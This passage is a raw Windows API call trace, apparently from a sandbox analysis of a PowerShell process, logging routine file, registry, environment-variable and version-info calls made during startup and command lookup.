lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), fInfoLevelId=0x0, lpFileInformation=0x2629458 | out: lpFileInformation=0x2629458*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa18da600, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x6fe6aea0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x3606)) returned 1 [0164.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4e5f09c) returned 1 [0164.230] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0164.230] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0164.230] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4e5f28c) returned 1 [0164.230] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.233] GetFileType (hFile=0x36c) returned 0x1 [0164.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4e5f288) returned 1 [0164.233] GetFileType (hFile=0x36c) returned 0x1 [0164.240] WriteFile (in: hFile=0x36c, lpBuffer=0x2629598*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x4e5f310, lpOverlapped=0x0 | out: lpBuffer=0x2629598*, lpNumberOfBytesWritten=0x4e5f310*=0x1000, lpOverlapped=0x0) returned 1 [0164.242] WriteFile (in: hFile=0x36c, lpBuffer=0x2629598*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x4e5f310, lpOverlapped=0x0 | out: lpBuffer=0x2629598*, lpNumberOfBytesWritten=0x4e5f310*=0x1000, lpOverlapped=0x0) returned 1 [0164.243] WriteFile (in: hFile=0x36c, lpBuffer=0x2629598*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x4e5f310, lpOverlapped=0x0 | out: lpBuffer=0x2629598*, lpNumberOfBytesWritten=0x4e5f310*=0x1000, lpOverlapped=0x0) returned 1 [0164.243] WriteFile (in: hFile=0x36c, lpBuffer=0x2629598*, nNumberOfBytesToWrite=0x76b, lpNumberOfBytesWritten=0x4e5f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2629598*, lpNumberOfBytesWritten=0x4e5f2fc*=0x76b, lpOverlapped=0x0) returned 1 [0164.244] CloseHandle (hObject=0x36c) returned 1 [0164.246] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0164.246] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0164.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4e5f0a0) returned 1 [0164.246] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), fInfoLevelId=0x0, lpFileInformation=0x262f8fc | out: lpFileInformation=0x262f8fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa18da600, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x83808120, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x376b)) returned 1 [0164.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4e5f09c) returned 1 [0165.046] VarR8FromDec (in: pdecIn=0x4e5efb4, pdblOut=0x4e5efa0 | out: pdblOut=0x4e5efa0) returned 0x0 [0165.046] VarR8FromDec (in: pdecIn=0x4e5efc8, pdblOut=0x4e5efb4 | out: pdblOut=0x4e5efb4) returned 0x0 [0165.046] VarR8FromDec (in: pdecIn=0x4e5efb4, pdblOut=0x4e5efa0 | out: pdblOut=0x4e5efa0) returned 0x0 [0165.046] VarR8FromDec (in: pdecIn=0x4e5efc8, pdblOut=0x4e5efb4 | out: pdblOut=0x4e5efb4) returned 0x0 [0165.046] VarR8FromDec (in: pdecIn=0x4e5efb4, pdblOut=0x4e5efa0 | out: pdblOut=0x4e5efa0) returned 0x0 [0165.046] VarR8FromDec (in: pdecIn=0x4e5efc8, pdblOut=0x4e5efb4 | out: pdblOut=0x4e5efb4) returned 0x0 [0165.047] VarR8FromDec (in: pdecIn=0x4e5efb4, pdblOut=0x4e5efa0 | out: pdblOut=0x4e5efa0) returned 0x0 [0165.047] VarR8FromDec (in: pdecIn=0x4e5efc8, pdblOut=0x4e5efb4 | out: pdblOut=0x4e5efb4) returned 0x0 [0165.047] VarR8FromDec (in: pdecIn=0x4e5efb4, pdblOut=0x4e5efa0 | out: pdblOut=0x4e5efa0) returned 0x0 [0165.047] VarR8FromDec (in: pdecIn=0x4e5efc8, pdblOut=0x4e5efb4 | out: pdblOut=0x4e5efb4) returned 0x0 [0165.047] VarR8FromDec (in: pdecIn=0x4e5efb4, pdblOut=0x4e5efa0 | out: pdblOut=0x4e5efa0) returned 0x0 [0165.058] VarDecCmp (pdecLeft=0x4e5ee94, pdecRight=0x4e5ee84) returned 0x0 [0165.058] VarDecCmp (pdecLeft=0x4e5ee94, pdecRight=0x4e5ee84) returned 0x0 [0165.058] VarDecCmp (pdecLeft=0x4e5ee94, pdecRight=0x4e5ee84) returned 0x0 [0165.058] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5eea0, pdecRight=0x4e5ee90) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5eea0, pdecRight=0x4e5ee90) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5ee44, pdecRight=0x4e5ee34) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5ee44, pdecRight=0x4e5ee34) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5ee70, pdecRight=0x4e5ee60) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5ee50, pdecRight=0x4e5ee40) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5ee70, pdecRight=0x4e5ee60) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5ee70, pdecRight=0x4e5ee60) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5ee50, pdecRight=0x4e5ee40) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5ee94, pdecRight=0x4e5ee84) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5ee94, pdecRight=0x4e5ee84) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5ee94, pdecRight=0x4e5ee84) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5eea0, pdecRight=0x4e5ee90) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x0 [0165.059] VarDecCmp (pdecLeft=0x4e5eec0, pdecRight=0x4e5eeb0) returned 0x1 [0165.059] VarDecCmp (pdecLeft=0x4e5eea0, pdecRight=0x4e5ee90) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ef70, pdecRight=0x4e5ef60) returned 0x0 [0165.061] VarDecCmp (pdecLeft=0x4e5ef50, pdecRight=0x4e5ef40) returned 0x2 [0165.061] VarDecCmp (pdecLeft=0x4e5ef70, pdecRight=0x4e5ef60) returned 0x0 [0165.061] VarDecCmp (pdecLeft=0x4e5ef50, pdecRight=0x4e5ef40) returned 0x2 [0165.061] VarDecCmp (pdecLeft=0x4e5ef70, pdecRight=0x4e5ef60) returned 0x0 [0165.061] VarDecCmp (pdecLeft=0x4e5ef50, pdecRight=0x4e5ef40) returned 0x2 [0165.061] VarDecCmp (pdecLeft=0x4e5ef70, pdecRight=0x4e5ef60) returned 0x0 [0165.061] VarDecCmp (pdecLeft=0x4e5ef50, pdecRight=0x4e5ef40) returned 0x2 [0165.061] VarDecCmp (pdecLeft=0x4e5ef70, pdecRight=0x4e5ef60) returned 0x0 [0165.061] VarDecCmp (pdecLeft=0x4e5ef50, pdecRight=0x4e5ef40) returned 0x2 [0165.061] VarDecCmp (pdecLeft=0x4e5eeb4, pdecRight=0x4e5eea4) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ee34, pdecRight=0x4e5ee24) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ee34, pdecRight=0x4e5ee24) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ee34, pdecRight=0x4e5ee24) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ee34, pdecRight=0x4e5ee24) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ee34, pdecRight=0x4e5ee24) returned 0x1 [0165.061] VarDecCmp (pdecLeft=0x4e5ee34, pdecRight=0x4e5ee24) returned 0x1 Thread: id = 82 os_tid = 0xfe8 Thread: id = 83 os_tid = 0xfec Thread: id = 84 os_tid = 0xff0 [0108.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.350] EtwEventRegister () returned 0x0 [0109.363] CoCreateGuid (in: pguid=0x5a0f03c | out: pguid=0x5a0f03c*(Data1=0x7cf88114, Data2=0x82fa, Data3=0x4a6b, Data4=([0]=0xb4, [1]=0x59, [2]=0x11, [3]=0x3c, [4]=0x5, [5]=0x20, [6]=0xa9, [7]=0xf0))) returned 0x0 [0109.381] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0f01c | out: lpPerformanceCount=0x5a0f01c*=2939419177056) returned 1 [0109.382] GetCurrentProcessId () returned 0xf88 [0109.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x3cc [0109.382] EnumProcessModules (in: hProcess=0x3cc, lphModule=0x255fb3c, cb=0x100, lpcbNeeded=0x5a0ef14 | out: lphModule=0x255fb3c, lpcbNeeded=0x5a0ef14) returned 1 [0109.384] GetModuleInformation (in: hProcess=0x3cc, hModule=0x320000, lpmodinfo=0x255fc7c, cb=0xc | out: lpmodinfo=0x255fc7c*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0109.384] CoTaskMemAlloc (cb=0x804) returned 0x5bc2e00 [0109.384] GetModuleBaseNameW (in: hProcess=0x3cc, hModule=0x320000, lpBaseName=0x5bc2e00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0109.385] CoTaskMemFree (pv=0x5bc2e00) [0109.385] CoTaskMemAlloc (cb=0x804) returned 0x5bc2e00 [0109.385] GetModuleFileNameExW (in: hProcess=0x3cc, hModule=0x320000, lpFilename=0x5bc2e00, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0109.385] CoTaskMemFree (pv=0x5bc2e00) [0109.385] CloseHandle (hObject=0x3cc) returned 1 [0109.386] LocalReAlloc (hMem=0x646f60, uBytes=0x208, uFlags=0x2) returned 0x5bc3b18 [0109.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x104, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0109.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ec4c) returned 1 [0109.386] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x5a0ef10 | out: lpFileInformation=0x5a0ef10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b7f9180, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8b7f9180, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x7711b3a3, ftLastWriteTime.dwHighDateTime=0x1d251bc, nFileSizeHigh=0x0, nFileSizeLow=0x68400)) returned 1 [0109.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ec48) returned 1 [0109.386] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x5a0ef84 | out: lpdwHandle=0x5a0ef84) returned 0x74c [0109.387] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x74c, lpData=0x2561ebc | out: lpData=0x2561ebc) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x5a0ef58, puLen=0x5a0ef54 | out: lplpBuffer=0x5a0ef58*=0x256225c, puLen=0x5a0ef54) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x2561f74, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x2561fc8, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x2562010, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x2562084, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x25620c0, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x2562144, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x256218c, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x25621fc, puLen=0x5a0eed4) returned 1 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x0, puLen=0x5a0eed4) returned 0 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x0, puLen=0x5a0eed4) returned 0 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x0, puLen=0x5a0eed4) returned 0 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x5a0eed8, puLen=0x5a0eed4 | out: lplpBuffer=0x5a0eed8*=0x0, puLen=0x5a0eed4) returned 0 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x5a0eecc, puLen=0x5a0eec8 | out: lplpBuffer=0x5a0eecc*=0x256225c, puLen=0x5a0eec8) returned 1 [0109.388] VerLanguageNameW (in: wLang=0x409, szLang=0x5a0ec5c, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0109.388] VerQueryValueW (in: pBlock=0x2561ebc, lpSubBlock="\\", lplpBuffer=0x5a0eedc, puLen=0x5a0eed8 | out: lplpBuffer=0x5a0eedc*=0x2561ee4, puLen=0x5a0eed8) returned 1 [0111.054] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0efe4 | out: lpPerformanceCount=0x5a0efe4*=2939586470982) returned 1 [0111.070] EtwEventRegister () returned 0x0 [0111.071] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0ee54, nSize=0x80 | out: lpBuffer="") returned 0x0 [0111.264] EtwEventActivityIdControl () returned 0x0 [0111.264] EtwEventActivityIdControl () returned 0x0 [0111.264] EtwEventActivityIdControl () returned 0x0 [0111.270] EtwEventActivityIdControl () returned 0x0 [0111.270] EtwEventActivityIdControl () returned 0x0 [0111.270] EtwEventActivityIdControl () returned 0x0 [0111.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0e65c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0111.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0e65c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0111.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0e648, nSize=0x80 | out: lpBuffer="") returned 0x0 [0111.699] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0eec0 | out: phkResult=0x5a0eec0*=0x0) returned 0x2 [0111.700] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0eec0 | out: phkResult=0x5a0eec0*=0x0) returned 0x2 [0111.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0e618, nSize=0x80 | out: lpBuffer="") returned 0x0 [0111.726] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0ea00, nSize=0x80 | out: lpBuffer="") returned 0x0 [0111.729] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5a0e91c, nSize=0x80 | out: lpBuffer="") returned 0xc9 [0111.729] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5a0e888, nSize=0xc9 | out: lpBuffer="") returned 0xc8 [0111.730] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0e874, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0111.817] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5bc3b18 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a [0111.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0e87c, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0111.823] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0111.823] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0111.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e788) returned 1 [0111.823] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea4c | out: lpFileInformation=0x5a0ea4c*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x46c57d00, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x46c57d00, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x46c57d00, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0111.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e784) returned 1 [0111.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea44) returned 1 [0111.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0111.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0111.828] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\new-object.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.*"), lpFindFileData=0x5a0e7f4 | out: lpFindFileData=0x5a0e7f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0111.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e79c) returned 1 [0111.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e9fc) returned 1 [0111.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0e10c, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0111.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0111.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0111.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e788) returned 1 [0111.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea4c | out: lpFileInformation=0x5a0ea4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x26f5fe20, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x26f5fe20, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0111.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e784) returned 1 [0111.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea44) returned 1 [0111.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0111.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0111.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\new-object.*" (normalized: "c:\\windows\\syswow64\\new-object.*"), lpFindFileData=0x5a0e7f4 | out: lpFindFileData=0x5a0e7f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0111.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e79c) returned 1 [0111.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e9fc) returned 1 [0111.833] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0111.833] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0111.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e788) returned 1 [0111.833] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea4c | out: lpFileInformation=0x5a0ea4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd3858bf0, ftLastAccessTime.dwHighDateTime=0x1d8c12f, ftLastWriteTime.dwLowDateTime=0xd3858bf0, ftLastWriteTime.dwHighDateTime=0x1d8c12f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0111.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e784) returned 1 [0111.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea44) returned 1 [0111.833] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0111.833] GetFullPathNameW (in: 